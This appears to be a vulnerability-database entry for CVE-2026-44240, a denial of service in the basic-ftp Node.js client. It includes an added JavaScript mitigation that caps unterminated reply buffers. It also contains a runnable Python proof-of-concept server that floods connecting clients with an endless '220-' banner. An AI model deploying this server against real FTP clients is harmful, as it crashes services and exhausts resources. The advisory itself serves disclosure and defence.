Security Vulnerability Report
CVE-2026-44240 CVSS 7.5 HIGH

CVE-2026-44240

Published: 2026-05-12 21:16:16
Last Modified: 2026-05-12 21:16:16

Description

basic-ftp is an FTP client for Node.js. Prior to 5.3.1, basic-ftp is vulnerable to client-side denial of service when parsing FTP control-channel multiline responses. A malicious or compromised FTP server can send an unterminated multiline response during the initial FTP banner phase, before authentication. The client keeps appending attacker-controlled data into FtpContext._partialResponse and repeatedly reparses the accumulated buffer without enforcing a maximum control response size. As a result, an application using basic-ftp can remain stuck in connect() while memory and CPU usage grow under attacker-controlled input. This can lead to process-level denial of service, container OOM kills, worker restarts, queue backlog, or service degradation in applications that automatically connect to FTP endpoints. This vulnerability is fixed in 5.3.1.
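A defender-side counterpart to the flaw described above, added here as an example and not taken from basic-ftp or its 5.3.1 fix: a multiline-reply parser whose accumulator enforces a maximum size for an unterminated reply, so a banner that never closes makes connect() fail quickly instead of growing memory and CPU. The function and class names are assumed for illustration.

```javascript
// Added example, not basic-ftp's own code; parseControlResponse and
// BoundedResponseBuffer are illustrative names, not the library's API.
// RFC 959: a multiline reply opens with "ddd-" and closes with a line
// beginning with the same code followed by a space ("ddd ").
function parseControlResponse(text) {
  const lines = text.split(/\r?\n/);
  const rest = lines.pop(); // bytes after the last line terminator, if any
  const messages = [];
  let current = [];
  let openCode = null;
  for (const line of lines) {
    if (openCode === null) {
      const m = /^(\d{3})([ -])/.exec(line);
      if (m && m[2] === "-") { openCode = m[1]; current = [line]; continue; }
      messages.push({ code: m ? Number(m[1]) : NaN, text: line });
      continue;
    }
    current.push(line);
    if (line.startsWith(openCode + " ")) {
      messages.push({ code: Number(openCode), text: current.join("\n") });
      current = []; openCode = null;
    }
  }
  // An unterminated multiline reply is carried over to the next chunk.
  const partial = current.length ? current.join("\n") + "\n" + rest : rest;
  return { messages, partial };
}

class BoundedResponseBuffer {
  constructor(maxPartialBytes = 64 * 1024) {
    this.maxPartialBytes = maxPartialBytes;
    this.partial = "";
  }
  // Returns completed replies; throws once the unterminated remainder exceeds
  // the cap, so a caller's connect() fails fast instead of accumulating forever.
  feed(chunk) {
    const { messages, partial } = parseControlResponse(this.partial + chunk);
    if (Buffer.byteLength(partial, "utf8") > this.maxPartialBytes) {
      this.partial = "";
      throw new Error(`control reply exceeds ${this.maxPartialBytes} bytes unterminated`);
    }
    this.partial = partial;
    return messages;
  }
}
```

With a cap of 64 bytes, a constructed stream of "220-never ends" lines is accepted four times and rejected on the fifth feed, whereas a properly closed "220 Ready" line completes the reply and empties the buffer.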

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

basic-ftp < 5.3.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket

# Create a malicious FTP server to exploit the vulnerability
def start_malicious_ftp():
    host = '0.0.0.0'
    port = 21
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, port))
        s.listen(1)
        print(f"[+] Malicious FTP server listening on {host}:{port}")
        conn, addr = s.accept()
        print(f"[+] Connection established from {addr}")
        try:
            # Send an unterminated multiline response (starts with 220- but never sends the final "220 ")
            # This causes basic-ftp to keep appending data to _partialResponse
            payload = b"220-Welcome to the malicious FTP server\n"
            while True:
                conn.send(payload)
                # In a real scenario, sending attacker-controlled data to consume memory
        except ConnectionResetError:
            print("[-] Client disconnected")
        finally:
            conn.close()

if __name__ == "__main__":
    start_malicious_ftp()

References

https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-rpmf-866q-6p89

Weaknesses

CWE-400, CWE-770